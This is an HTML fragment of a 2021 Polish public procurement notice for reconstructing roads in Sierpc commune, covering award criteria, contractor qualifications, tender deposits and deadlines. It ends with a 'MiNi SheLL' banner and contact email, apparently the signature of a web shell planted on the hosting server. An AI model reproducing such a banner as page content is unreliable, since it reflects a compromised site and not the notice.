opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej (warunek określony dla każdej części <br/>zamówienia):<br/>a) W zakresie osób zdolnych do wykonania zamówienia.<br/> Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie <br/> dysponować następującymi osobami:<br/>- co najmniej jedną osobą posiadającą uprawnienia budowlane do <br/> kierowania robotami budowlanymi w specjalności drogowej.<br/><br/> Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez <br/> Zamawiającego, w oparciu o informacje zawarte w:<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu,<br/> - wykazie osób,<br/> - dokumencie potwierdzającym posiadanie uprawnień budowlanych do <br/> kierowania robotami budowlanymi w specjalności drogowej.<br/><br/>b) W zakresie doświadczenia zawodowego niezbędnego do wykonania <br/> zamówienia. Warunek w rozumieniu Zamawiającego spełni Wykonawca, który <br/> wykaże wykonanie:<br/> - co najmniej 1 (jednej) roboty budowlanej polegającej na budowie lub <br/> przebudowie drogi o nawierzchni bitumicznej o długości nie mniejszej niż 500 <br/> mb wykonanej nie wcześniej niż w okresie ostatnich 5 (pięciu) lat przed <br/> upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/> krótszy – w tym okresie wraz z podaniem ich rodzaju, wartości, daty, miejsca <br/> wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z <br/> załączeniem dowodów określających czy te roboty <br/> budowlane zostały wykonane należycie.<br/><br/> Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez <br/> Zamawiającego, w oparciu o informacje zawarte w:<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu,<br/> - wykazie wykonanych robót budowlanych oraz w dowodach określających, czy <br/> roboty te zostały wykonane w sposób należyty oraz wykazujących, czy <br/> zostały wykonane zgodnie <br/> z zasadami sztuki budowlanej i prawidłowo ukończone.<br/> Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione <br/> przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z <br/> uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w <br/> stanie uzyskać tych dokumentów – inne dokumenty. W przypadku składania <br/> oferty wspólnej w/w warunki będą oceniane łącznie.Zamawiający może, na <br/> każdym etapie postępowania, uznać, że Wykonawca nie posiada <br/> wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub <br/> zawodowych <br/> Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizacje zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o niepodleganiu wykluczeniu – składane na podstawie<br/> art. 125 ust. 1 ustawy PZP (zgodnie z treścią załącznika nr 3 do SWZ); <br/> Oświadczenie Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu <br/> (zgodnie z treścią załącznika nr 3a do SWZ)<br/>Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/> przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego <br/> 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), <br/> z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek <br/> o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej <br/> samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/> przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału <br/> w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy <br/> kapitałowej – (zgodnie z załącznikiem nr 6 do SWZ);<br/>Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/> i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy pzp, <br/> sporządzonych nie wcześniej niż 3 miesiące przed jej założeniem, jeżeli odrębne przepisy <br/> wymagają wpisu do rejestru lub ewidencji.<br/>Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/> i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy pzp, <br/> sporządzonych nie wcześniej niż 3 miesiące przed jej założeniem, jeżeli odrębne przepisy <br/> wymagają wpisu do rejestru lub ewidencji.<br/>Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że <br/> wykonawca nie zalega z opłaceniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 <br/> ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku <br/> zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda <br/> złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu <br/> składania ofert wykonawca dokonał płatności należnych podatków lub opłat <br/> wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych <br/> należności;<br/>Zaświadczenie albo inny dokument właściwej terenowej jednostki <br/> organizacyjnej Zakładu ubezpieczeń Społecznych lub właściwego oddziału <br/> regionalnego lub właściwej placówki terenowej kasy Rolniczego ubezpieczenia <br/> Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na <br/> ubezpieczenia społeczne i zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy, <br/> wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku <br/> zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne <br/> wraz z zaświadczeniem albo innym dokumentem zamawiający żąda aby przed upływem <br/> terminu składania ofert wykonawca dokonał płatności należnych składek na <br/> ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł <br/> wiążące porozumienie w sprawie spłat tych należności.<br/>Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/> o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia<br/> z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>a) art. 108 ust. 1 -6 ustawy, <br/>b) art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących płatności <br/> podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. <br/> o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170), <br/>c) art. 109 ust. 1 pkt 5,7 i 10 ustawy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – <br/> składane na podstawie art. 125 ust. 1 ustawy PZP (zgodnie z treścią załącznika nr 2 do SWZ);<br/>Oświadczenie Podmiotu udostępniającego zasoby dotyczące spełniania warunków udziału w postępowaniu (zgodnie z treścią załącznika nr 2a do SWZ)<br/>Zobowiązanie innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (zgodnie z treścią załącznika nr 5 do SWZ)<br/>Wykaz robót budowlanych - co najmniej 1 (jednej) roboty budowlanej polegającej na budowie lub przebudowie drogi o nawierzchni bitumicznej o długości nie mniejszej niż 500 mb wykonanej nie wcześniej niż w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których <br/> roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie.<br/><br/>Wykaz osób - co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania <br/> robotami budowlanymi w specjalności drogowej.<br/><br/> Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez <br/> Zamawiającego, w oparciu o informacje zawarte w:<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu,<br/> - wykazie osób,<br/> - dokumencie potwierdzającym posiadanie uprawnień budowlanych do kierowania <br/> robotami budowlanymi w specjalności drogowej.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta winna być zabezpieczona wadium (dla każdej części zamówienia oddzielnie): <br/>1.1. Dla części 1 zamówienia – Przebudowa drogi gminnej w miejscowości <br/> Borkowo Kościelne ul. Ogrodowa w wysokości 3.000,00 zł<br/><br/>1.2. Dla części 2 zamówienia – Przebudowa drogi gminnej w miejscowości Rachocin <br/> w wysokości 3.000,00 zł<br/>1.3. Dla części 3 zamówienia – Przebudowa drogi wewnętrznej w miejscowości <br/> Studzieniec w wysokości 2.000,00 zł<br/>1.4. Dla części 4 zamówienia – Przebudowa dróg gminnej i wewnętrznej w miejscowości <br/> Sułocin Towarzystwo w wysokości 3.000,00 zł<br/><br/>2. Wadium wnosi się przed upływem terminu składania ofert, w szczególności wadium<br/> w formie pieniężnej winno wpłynąć na konto Zamawiającego przed upływem terminu <br/> składania ofert. <br/>3. Wadium musi obejmować okres związania ofertą tj. do dnia 03.08.2021r roku licząc od <br/> dnia upływu terminu składania ofert. <br/>4. Wykonawca może wnieść wadium w: <br/>a) pieniądzu, <br/>b) gwarancjach bankowych, <br/>c) gwarancjach ubezpieczeniowych, <br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z <br/> dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. <br/> z 2019 r. poz. 310, 836 i 1572).<br/> <br/>5. W przypadku wnoszenia wadium w pieniądzu Wykonawca jest zobowiązany wpłacić <br/> wadium przelewem na rachunek Zamawiającego: Bank Spółdzielczy w Starej Białej <br/> Oddział w Sierpcu, nr konta: 52 9015 0001 2005 0000 0521 0012, z dopiskiem na <br/> przelewie: <br/>5.1. Dla części 1<br/> „Wadium na zabezpieczenie oferty Wykonawcy………………………………………<br/> dotyczącej zamówienia p.n.: Przebudowa dróg gminnych i wewnętrznych na terenie <br/> gminy Sierpc – Przebudowa drogi gminnej w miejscowości Borkowo Kościelne <br/> ul. Ogrodowa”.<br/>5.2. Dla części 2<br/> „Wadium na zabezpieczenie oferty Wykonawcy………………………………………<br/> dotyczącej zamówienia p.n.: Przebudowa dróg gminnych i wewnętrznych na terenie <br/> gminy Sierpc – Przebudowa drogi gminnej w miejscowości Rachocin”.<br/><br/>5.3. Dla części 3 <br/> „Wadium na zabezpieczenie oferty Wykonawcy………………………………………<br/> dotyczącej zamówienia p.n.: Przebudowa dróg gminnych i wewnętrznych na terenie <br/> gminy Sierpc – Przebudowa drogi wewnętrznej w miejscowości Studzieniec.<br/><br/>5.4. Dla części 4 <br/> „Wadium na zabezpieczenie oferty Wykonawcy………………………………………<br/> dotyczącej zamówienia p.n.: Przebudowa dróg gminnych i wewnętrznych na terenie <br/> gminy Sierpc – Przebudowa dróg gminnej i wewnętrznej w miejscowości <br/> Sułocin Towarzystwo.<br/>6. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które <br/> w wyznaczonym terminie składania ofert znajduje się na wskazanym rachunku bankowym <br/> Zamawiającego. <br/>7. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego wniesienie <br/> wadium w pieniądzu na rachunek bankowy Zamawiającego. <br/>8. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>9. W przypadku wadium wnoszonego w innej formie niż w pieniądzu, wykonawca składa <br/> oryginał dokumentu w postaci elektronicznej załączając go do oferty. Dokument ten <br/> powinien być podpisany kwalifikowanym podpisem elektronicznym przez jego wystawcę. <br/> Z treści dokumentu (gwarancji, poręczenia) winno wynikać bezwarunkowe, na każdym <br/> pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, <br/> zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo <br/> do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. <br/> Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/> oświadczenia, o których mowa w Rozdziale VIII pkt 1.1. i 1.2. <br/> SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw <br/> wykluczenia oraz oświadczenie o spełnianiu warunków udziału w zakresie, w jakim każdy <br/> z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty <br/> oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni <br/> wykonawcy zgodnie z załącznikiem nr 4 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania <br/> składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4. Strony, poza możliwością zmiany zawartej Umowy na podstawie art. 455 Pzp, przewidują <br/> również możliwość dokonywania zmian postanowień zawartej Umowy, które mogą <br/> dotyczyć:<br/>4.1. wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym <br/> wpływ na realizację przedmiotu umowy;<br/>4.2. wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustania <br/> stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od Wykonawcy) <br/> przy pomocy, których Wykonawca realizuje przedmiot umowy.<br/>4.3. zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy,<br/> a w szczególności: <br/>a) okoliczności leżących po stronie Zamawiającego, tj. między innymi wstrzymania robót <br/> przez Zamawiającego; <br/>b) odmowy lub opóźnienia wydania przez organy administracji<br/> lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień, opinii z przyczyn <br/> niezawinionych przez Wykonawcę; <br/>c) wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie (prowadzenie) <br/> robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów – fakt ten <br/> musi być potwierdzony przez Zamawiającego; <br/>d) zmian spowodowanych nieprzewidzianymi warunkami geologicznymi, archeologicznymi <br/> lub terenowymi, w szczególności: niewypały i niewybuchy, wykopaliska archeologiczne; e) odmiennych (ale istotnych dla realizacji) od przyjętych w dokumentacji projektowej <br/> warunków terenowych, w szczególności istnienie nie zinwentaryzowanych lub błędnie <br/> zinwentaryzowanych elementów budowlanych; <br/>f) przyczyn niezależnych od stron umowy, które będą skutkowały koniecznością <br/> zastosowania innych rozwiązań, gdy zastosowanie rozwiązań przewidzianych w <br/> dokumentach zamówienia groziłoby niewykonaniem lub wadliwym wykonaniem Umowy; g) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo <br/> zachowania należytej staranności. <br/>4.4. wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi <br/> okolicznościami:<br/> a) „siła wyższa” uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym <br/> opisem, w tym ograniczenia wprowadzone decyzjami władz publicznych;<br/> b)zmiana danych związanych ze zmianami administracyjno-organizacyjno-prawnymi <br/> umowy; <br/>c) rezygnacją przez Zamawiającego z realizacji części przedmiotu umowy. <br/>5.Wszelkie zmiany do niniejszej umowy wymagają zgody obu stron oraz pisemnego aneksu <br/> podpisanego przez strony. W przypadku każdej zmiany o której mowa powyżej po stronie <br/> wnoszącego propozycję zmian leży uzasadnienie powstałej okoliczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-05 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-05 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-18 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com